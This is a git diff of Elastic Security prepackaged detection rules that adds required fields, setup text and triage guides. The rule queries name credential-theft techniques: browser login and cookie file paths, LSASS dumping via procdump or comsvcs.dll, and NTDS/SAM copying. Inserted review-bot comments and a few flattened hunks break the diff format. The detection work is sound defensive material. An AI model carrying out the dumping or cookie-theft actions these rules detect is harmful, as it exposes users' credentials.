diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_vnc_virtual_network_computing_to_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_vnc_virtual_network_computing_to_the_internet.json
index 342ac388736ba..2bacf02173368 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_vnc_virtual_network_computing_to_the_internet.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_vnc_virtual_network_computing_to_the_internet.json
@@ -20,6 +20,33 @@
 "references": [
 "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.ip",
+ "type": "ip"
+ },
+ {
+ "ecs": true,
+ "name": "destination.port",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "network.transport",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "source.ip",
+ "type": "ip"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "3ad49c61-7adc-42c1-b788-732eda2f5abf",
 "severity": "medium",
@@ -50,5 +77,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 11
+ "version": 12
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_access_to_browser_credentials_procargs.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_access_to_browser_credentials_procargs.json
index 021fc87afc5da..30e877ef6120b 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_access_to_browser_credentials_procargs.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_access_to_browser_credentials_procargs.json
@@ -11,13 +11,26 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Access of Stored Browser Credentials",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
- "query": "process where event.type in (\"start\", \"process_started\") and\n process.args :\n (\n \"/Users/*/Library/Application Support/Google/Chrome/Default/Login Data\", \n \"/Users/*/Library/Application Support/Google/Chrome/Default/Cookies\", \n \"/Users/*/Library/Cookies*\", \n \"/Users/*/Library/Application Support/Firefox/Profiles/*.default/cookies.sqlite\", \n \"/Users/*/Library/Application Support/Firefox/Profiles/*.default/key*.db\", \n \"/Users/*/Library/Application Support/Firefox/Profiles/*.default/logins.json\", \n \"Login Data\",\n \"Cookies.binarycookies\", \n \"key4.db\", \n \"key3.db\", \n \"logins.json\", \n \"cookies.sqlite\"\n )\n",
+ "note": "",
+ "query": "process where event.type in (\"start\", \"process_started\") and\n process.args :\n (\n \"/Users/*/Library/Application Support/Google/Chrome/Default/Login Data\",\n \"/Users/*/Library/Application Support/Google/Chrome/Default/Cookies\",\n \"/Users/*/Library/Application Support/Google/Chrome/Profile*/Cookies\",\n \"/Users/*/Library/Cookies*\",\n \"/Users/*/Library/Application Support/Firefox/Profiles/*.default/cookies.sqlite\",\n \"/Users/*/Library/Application Support/Firefox/Profiles/*.default/key*.db\",\n \"/Users/*/Library/Application Support/Firefox/Profiles/*.default/logins.json\",\n \"Login Data\",\n \"Cookies.binarycookies\",\n \"key4.db\",\n \"key3.db\",\n \"logins.json\",\n \"cookies.sqlite\"\n )\n",
 "references": [
 "https://securelist.com/calisto-trojan-for-macos/86543/"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "20457e4f-d1de-4b92-ae69-142e27a4342a",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -35,6 +48,11 @@
 "reference": "https://attack.mitre.org/tactics/TA0006/"
 },
 "technique": [
+ {
+ "id": "T1539",
+ "name": "Steal Web Session Cookie",
+ "reference": "https://attack.mitre.org/techniques/T1539/"
+ },
 {
 "id": "T1555",
 "name": "Credentials from Password Stores",
@@ -52,5 +70,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 2
+ "version": 4
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_attempted_bypass_of_okta_mfa.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_attempted_bypass_of_okta_mfa.json
index fc3c3f5ca90d9..91b679b07455a 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_attempted_bypass_of_okta_mfa.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_attempted_bypass_of_okta_mfa.json
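Review bot: The new query line for Chrome extends coverage to non-default profiles only for `Cookies`; `Login Data` is still matched only under `Default/`, so the same access against `Profile 1/Login Data` does not fire. The Firefox entries have a parallel gap: they require the profile directory to end in `.default`, whereas current Firefox releases create `<id>.default-release` profiles, and because the `:` operator matches the whole argument the bare-filename entries further down do not cover a full path either. Consider adding `"/Users/*/Library/Application Support/Google/Chrome/Profile*/Login Data"` and widening the three Firefox entries to `Profiles/*.default*/cookies.sqlite`, `Profiles/*.default*/key*.db` and `Profiles/*.default*/logins.json`. With the rule now also mapped to T1539, the cookie paths are the part worth tightening first.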
@@ -10,14 +10,33 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Attempted Bypass of Okta MFA",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:okta.system and event.action:user.mfa.attempt_bypass\n",
 "references": [
 "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/"
 ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "3805c3dc-f82c-4f8d-891e-63c24d3102b0",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -38,7 +57,7 @@
 "technique": [
 {
 "id": "T1111",
- "name": "Two-Factor Authentication Interception",
+ "name": "Multi-Factor Authentication Interception",
 "reference": "https://attack.mitre.org/techniques/T1111/"
 }
 ]
@@ -46,5 +65,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_attempts_to_brute_force_okta_user_account.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_attempts_to_brute_force_okta_user_account.json
index ea2b05b485585..1bf0d315e4b20 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_attempts_to_brute_force_okta_user_account.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_attempts_to_brute_force_okta_user_account.json
@@ -13,14 +13,33 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Attempts to Brute Force an Okta User Account",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:okta.system and event.action:user.account.lock\n",
 "references": [
 "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/"
 ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "e08ccd49-0380-4b2b-8d71-8000377d6e49",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -54,5 +73,5 @@
 "value": 3
 },
 "type": "threshold",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_aws_iam_assume_role_brute_force.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_aws_iam_assume_role_brute_force.json
index 6ef3e3d255779..1c54726297ce7 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_aws_iam_assume_role_brute_force.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_aws_iam_assume_role_brute_force.json
@@ -11,14 +11,49 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS IAM Brute Force of Assume Role Policy", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS IAM Brute Force of Assume Role Policy\n\nAn IAM role is an IAM identity that you can create in your account that has specific permissions. An IAM role is similar\nto an IAM user, in that it is an AWS identity with permission policies that determine what the identity can and cannot\ndo in AWS. However, instead of being uniquely associated with one person, a role is intended to be assumable by anyone\nwho needs it. Also, a role does not have standard long-term credentials such as a password or access keys associated\nwith it. Instead, when you assume a role, it provides you with temporary security credentials for your role session.\n\nAttackers may attempt to enumerate IAM roles in order to determine if a role exists before attempting to assume or\nhijack the discovered role.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Verify if the `RoleName` parameter contains a unique value in all requests or if the activity is potentially a brute\nforce attack.\n- Verify if the user account successfully updated a trust policy in the last 24 hours.\n- Examine whether this role existed in the environment by looking for past occurrences in your logs.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Consider the time of day. 
If the user is a human (not a program or script), did the activity take place during a normal\ntime of day?\n- Examine the account's commands, API calls, and data management actions in the last 24 hours.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- Verify the roles targeted in the failed attempts, and whether the subject role previously existed in the environment.\nIf only one role was targeted in the requests and that role previously existed, it may be a false positive, since\nautomations can continue targeting roles that existed in the environment in the past and cause false positives (FPs).\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other\nIAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and\n event.provider:iam.amazonaws.com and event.action:UpdateAssumeRolePolicy and\n aws.cloudtrail.error_code:MalformedPolicyDocumentException and event.outcome:failure\n", "references": [ "https://www.praetorian.com/blog/aws-iam-assume-role-vulnerabilities", "https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.error_code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ea248a02-bc47-4043-8e94-2885b19b2636", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", 
@@ -50,5 +85,5 @@
 "value": 25
 },
 "type": "threshold",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_azure_full_network_packet_capture_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_azure_full_network_packet_capture_detected.json
index 110345fd316bb..ec3aabba7f887 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_azure_full_network_packet_capture_detected.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_azure_full_network_packet_capture_detected.json
@@ -14,13 +14,38 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Azure Full Network Packet Capture Detected",
- "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\n (\n \"MICROSOFT.NETWORK/*/STARTPACKETCAPTURE/ACTION\" or\n \"MICROSOFT.NETWORK/*/VPNCONNECTIONS/STARTPACKETCAPTURE/ACTION\" or\n \"MICROSOFT.NETWORK/*/PACKETCAPTURES/WRITE\"\n ) and \nevent.outcome:(Success or success)\n",
+ "note": "",
+ "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\n (\n \"MICROSOFT.NETWORK/*/STARTPACKETCAPTURE/ACTION\" or\n \"MICROSOFT.NETWORK/*/VPNCONNECTIONS/STARTPACKETCAPTURE/ACTION\" or\n \"MICROSOFT.NETWORK/*/PACKETCAPTURES/WRITE\"\n ) and\nevent.outcome:(Success or success)\n",
 "references": [
 "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations"
 ],
+ "related_integrations": [
+ {
+ "integration": "activitylogs",
+ "package": "azure",
+ "version": "0.12.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "azure.activitylogs.operation_name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "3ad77ed4-4dcf-4c51-8bfc-e3f7ce316b2f",
+ "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -49,5 +74,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 1
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_cmdline_dump_tool.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_cmdline_dump_tool.json
index eaf284c3a6c1c..d730a846d6ac2 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_cmdline_dump_tool.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_cmdline_dump_tool.json
@@ -12,13 +12,46 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via Windows Utilities", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Windows Utilities\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible\nfor enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles\npassword changes, and creates access tokens.\n\nThe `Ntds.dit` file is a database that stores Active Directory data, including information about user objects, groups, and\ngroup membership.\n\nThis rule looks for the execution of utilities that can extract credential data from the LSASS memory and Active\nDirectory `Ntds.dit` file.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file \nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify what information was targeted.\n- Identify the target computer and its role in the IT environment.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious\nmust be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the host is a domain controller (DC):\n - Activate your incident response plan for total Active Directory compromise.\n - Review the privileges assigned to users that can access the DCs, to ensure that the least privilege principle is\n being followed and to reduce the attack surface.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n/* update here with any new lolbas with dump capability */\n(process.pe.original_file_name == \"procdump\" and process.args : \"-ma\") or\n(process.name : \"ProcessDump.exe\" and not process.parent.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\Cisco Systems\\\\.*\"\"\") or\n(process.pe.original_file_name == \"WriteMiniDump.exe\" and not process.parent.executable regex~ \"\"\"C:\\\\Program Files( \\(x86\\))?\\\\Steam\\\\.*\"\"\") or\n(process.pe.original_file_name == \"RUNDLL32.EXE\" and (process.args : \"MiniDump*\" or process.command_line : \"*comsvcs.dll*#24*\")) or\n(process.pe.original_file_name == \"RdrLeakDiag.exe\" and 
process.args : \"/fullmemdmp\") or\n(process.pe.original_file_name == \"SqlDumper.exe\" and process.args : \"0x01100*\") or\n(process.pe.original_file_name == \"TTTracer.exe\" and process.args : \"-dumpFull\" and process.args : \"-attach\") or\n(process.pe.original_file_name == \"ntdsutil.exe\" and process.args : \"create*full*\") or\n(process.pe.original_file_name == \"diskshadow.exe\" and process.args : \"/s\")\n", "references": [ "https://lolbas-project.github.io/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "00140285-b827-4aee-aa09-8113f58a08f3", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -58,5 +91,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_collection_sensitive_files.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_collection_sensitive_files.json index bd155ce8e914d..18597067a939a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_collection_sensitive_files.json 
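Review bot: The unchanged `query` line on the new side applies the `event.type in ("start", "process_started")` filter only to the first `procdump` alternative, because in EQL `and` binds tighter than the `or` chain that follows it; every later alternative (ProcessDump, WriteMiniDump, rundll32 MiniDump, RdrLeakDiag, SqlDumper, TTTracer, ntdsutil, diskshadow) therefore matches any `process` event type, so a source that also populates `process.args` on other event types (end, info) would raise a second alert for the same command line. The fix is to open a parenthesis after the `and` and close it after the `diskshadow.exe` clause: `process where event.type in ("start", "process_started") and\n(\n  (process.pe.original_file_name == "procdump" and process.args : "-ma") or ... (process.pe.original_file_name == "diskshadow.exe" and process.args : "/s")\n)`. This line is not touched by the commit, so the change belongs in the same rule revision bump, and the rule object continues past the end of the hunk.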
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_collection_sensitive_files.json
@@ -15,6 +15,28 @@
 "references": [
 "https://www.trendmicro.com/en_ca/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "6b84d470-9036-4cc0-a27c-6d90bbfe81ab",
 "severity": "medium",
@@ -74,5 +96,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 1
+ "version": 2
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_cookies_chromium_browsers_debugging.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_cookies_chromium_browsers_debugging.json
index b50a678b18fc4..dcddb41d282db 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_cookies_chromium_browsers_debugging.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_cookies_chromium_browsers_debugging.json
@@ -17,16 +17,34 @@
 "license": "Elastic License v2",
 "max_signals": 33,
 "name": "Potential Cookies Theft via Browser Debugging",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
- "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.name in (\n \"Microsoft Edge\",\n \"chrome.exe\",\n \"Google Chrome\",\n \"google-chrome-stable\",\n \"google-chrome-beta\",\n \"google-chrome\",\n \"msedge.exe\") and\n process.args : (\"--remote-debugging-port=*\", \n \"--remote-debugging-targets=*\", \n \"--remote-debugging-pipe=*\") and\n process.args : \"--user-data-dir=*\" and not process.args:\"--remote-debugging-port=0\"\n",
+ "note": "",
+ "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.name in (\n \"Microsoft Edge\",\n \"chrome.exe\",\n \"Google Chrome\",\n \"google-chrome-stable\",\n \"google-chrome-beta\",\n \"google-chrome\",\n \"msedge.exe\") and\n process.args : (\"--remote-debugging-port=*\",\n \"--remote-debugging-targets=*\",\n \"--remote-debugging-pipe=*\") and\n process.args : \"--user-data-dir=*\" and not process.args:\"--remote-debugging-port=0\"\n",
 "references": [
 "https://github.com/defaultnamehere/cookie_crimes",
 "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/",
 "https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/chrome_cookies.md",
 "https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "027ff9ea-85e7-42e3-99d2-bbb7069e02eb",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -56,5 +74,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 2
+ "version": 4
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_copy_ntds_sam_volshadowcp_cmdline.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_copy_ntds_sam_volshadowcp_cmdline.json
index f7a566d3cbe04..42796338b3384 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_copy_ntds_sam_volshadowcp_cmdline.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_copy_ntds_sam_volshadowcp_cmdline.json
@@ -14,14 +14,32 @@
 "license": "Elastic License v2",
 "max_signals": 33,
 "name": "NTDS or SAM Database File Copied",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.type in (\"start\", \"process_started\") and\n (\n (process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\", \"XCOPY.EXE\") and\n process.args : (\"copy\", \"xcopy\", \"Copy-Item\", \"move\", \"cp\", \"mv\")\n ) or\n (process.pe.original_file_name : \"esentutl.exe\" and process.args : (\"*/y*\", \"*/vss*\", \"*/d*\"))\n ) and\n process.args : (\"*\\\\ntds.dit\", \"*\\\\config\\\\SAM\", \"\\\\*\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy*\\\\*\", \"*/system32/config/SAM*\")\n",
 "references": [
 "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
 "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -56,5 +74,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 6
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_credential_dumping_msbuild.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_credential_dumping_msbuild.json
index 8995c6ba7bb4c..a1f23d621ba05 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_credential_dumping_msbuild.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_credential_dumping_msbuild.json
@@ -14,8 +14,51 @@ ], "language": "eql", "license": "Elastic License v2", - "name": "Microsoft Build Engine Loading Windows Credential Libraries", - "query": "sequence by process.entity_id\n [process where event.type == \"start\" and (process.name : \"MSBuild.exe\" or process.pe.original_file_name == \"MSBuild.exe\")]\n [library where dll.name : (\"vaultcli.dll\", \"SAMLib.DLL\")]\n", + "name": "Potential Credential Access via Trusted Developer Utility", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML\nschema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was\nintroduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will\ncompile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass\napplication control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of\ncredential access activities.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
